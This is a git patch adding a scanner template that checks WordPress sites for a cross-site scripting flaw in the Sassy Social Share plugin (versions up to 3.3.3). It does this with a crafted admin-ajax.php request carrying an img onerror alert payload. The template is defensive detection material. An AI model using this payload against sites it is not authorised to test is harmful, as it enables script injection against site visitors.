From 6a1ade3566c5e1d9c5c5d633ae696dbb34121b25 Mon Sep 17 00:00:00 2001 From: Robbie Date: Tue, 20 Oct 2020 16:28:01 +0100 Subject: [PATCH] Create sassy-social-share.yaml --- vulnerabilities/sassy-social-share.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 vulnerabilities/sassy-social-share.yaml diff --git a/vulnerabilities/sassy-social-share.yaml b/vulnerabilities/sassy-social-share.yaml new file mode 100644 index 0000000000..a84219b0fd --- /dev/null +++ b/vulnerabilities/sassy-social-share.yaml @@ -0,0 +1,19 @@ +id: Sassy-Social-Share + +info: + name: Sassy Social Share XSS + author: Random-Robbie + severity: medium + description: Sassy Social Share <= 3.3.3 - Cross-Site Scripting (XSS) + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E]=" + + matchers-condition: and + matchers: + - type: word + words: + - '{"facebook_urls":[{"":""}],"status":1,"message":{"":{"twitter":0}}}' + part: body